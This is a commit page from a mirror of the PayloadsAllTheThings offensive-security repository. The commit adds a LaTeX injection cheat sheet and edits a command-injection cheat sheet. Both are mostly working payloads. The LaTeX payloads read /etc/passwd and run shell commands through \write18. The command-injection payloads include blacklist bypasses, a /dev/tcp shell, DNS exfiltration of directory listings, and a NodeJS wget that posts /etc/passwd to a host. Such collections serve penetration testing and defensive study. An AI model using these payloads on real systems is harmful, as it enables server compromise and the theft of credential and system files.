mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
LaTeX injection + RCE bypass with backslash
This commit is contained in:
parent
93f4bbb19e
commit
15891b3ab4
2 changed files with 75 additions and 13 deletions
57
LaTeX injection/README.md
Normal file
57
LaTeX injection/README.md
Normal file
|
@ -0,0 +1,57 @@
|
|||
# LaTex Injection
|
||||
|
||||
## Read file
|
||||
```python
|
||||
\input{/etc/passwd}
|
||||
\include{password} # load .tex file
|
||||
```
|
||||
|
||||
Read single lined file
|
||||
```python
|
||||
\newread\file
|
||||
\openin\file=/etc/issue
|
||||
\read\file to\line
|
||||
\text{\line}
|
||||
\closein\file
|
||||
```
|
||||
|
||||
Read multiple lined file
|
||||
```python
|
||||
\newread\file
|
||||
\openin\file=/etc/passwd
|
||||
\loop\unless\ifeof\file
|
||||
\read\file to\fileline
|
||||
\text{\fileline}
|
||||
\repeat
|
||||
\closein\file
|
||||
```
|
||||
|
||||
## Write file
|
||||
```python
|
||||
\newwrite\outfile
|
||||
\openout\outfile=cmd.tex
|
||||
\write\outfile{Hello-world}
|
||||
\closeout\outfile
|
||||
```
|
||||
|
||||
## Command execution
|
||||
The input of the command will be redirected to stdin, use a temp file to get it.
|
||||
```python
|
||||
\immediate\write18{env > output}
|
||||
\input{output}
|
||||
```
|
||||
If you get any LaTex error, consider using base64 to get the result without bad characters
|
||||
```python
|
||||
\immediate\write18{env | base64 > test.tex}
|
||||
\input{text.tex}
|
||||
```
|
||||
|
||||
```python
|
||||
\input|ls|base4
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
||||
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
||||
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|
|
@ -4,7 +4,7 @@ Remote Commands execution is a security vulnerability that allows an attacker to
|
|||
|
||||
## Exploits
|
||||
Normal Commands execution, execute the command and voila :p
|
||||
```
|
||||
```powershell
|
||||
cat /etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
||||
|
@ -13,7 +13,7 @@ sys:x:3:3:sys:/dev:/bin/sh
|
|||
```
|
||||
|
||||
Commands execution by chaining commands
|
||||
```
|
||||
```powershell
|
||||
original_cmd_by_server; ls
|
||||
original_cmd_by_server && ls
|
||||
original_cmd_by_server | ls
|
||||
|
@ -21,13 +21,13 @@ original_cmd_by_server || ls Only if the first cmd fail
|
|||
```
|
||||
|
||||
Commands execution inside a command
|
||||
```
|
||||
```powershell
|
||||
original_cmd_by_server `cat /etc/passwd`
|
||||
original_cmd_by_server $(cat /etc/passwd)
|
||||
```
|
||||
|
||||
Commands execution without space - Linux
|
||||
```
|
||||
```powershell
|
||||
swissky@crashlab:~/Www$ cat</etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
|
||||
|
@ -51,39 +51,44 @@ swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
|||
```
|
||||
|
||||
Commands execution without space - Windows
|
||||
```
|
||||
```powershell
|
||||
ping%CommonProgramFiles:~10,-18%IP
|
||||
ping%PROGRAMFILES:~10,-5%IP
|
||||
```
|
||||
|
||||
|
||||
Commands execution without spaces, $ or { } - Linux (Bash only)
|
||||
```
|
||||
```powershell
|
||||
IFS=,;`cat<<<uname,-a`
|
||||
```
|
||||
|
||||
Commands execution with a line return
|
||||
```
|
||||
```powershell
|
||||
something%0Acat%20/etc/passwd
|
||||
```
|
||||
|
||||
Bypass blacklisted word with single quote
|
||||
```
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with double quote
|
||||
```
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with $@
|
||||
Bypass blacklisted word with backslash
|
||||
```powershell
|
||||
w\ho\am\i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with $@
|
||||
```powershell
|
||||
who$@ami
|
||||
```
|
||||
|
||||
Bypass zsh/bash/sh blacklist
|
||||
```
|
||||
```powershell
|
||||
echo $0
|
||||
-> /usr/bin/zsh
|
||||
echo whoami|$0
|
||||
|
@ -92,7 +97,7 @@ echo whoami|$0
|
|||
|
||||
## Time based data exfiltration
|
||||
Extracting data : char by char
|
||||
```
|
||||
```powershell
|
||||
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
||||
real 0m5.007s
|
||||
user 0m0.000s
|
||||
|
@ -115,7 +120,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
|||
|
||||
## Environment based
|
||||
NodeJS Commands execution
|
||||
```
|
||||
```powershell
|
||||
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue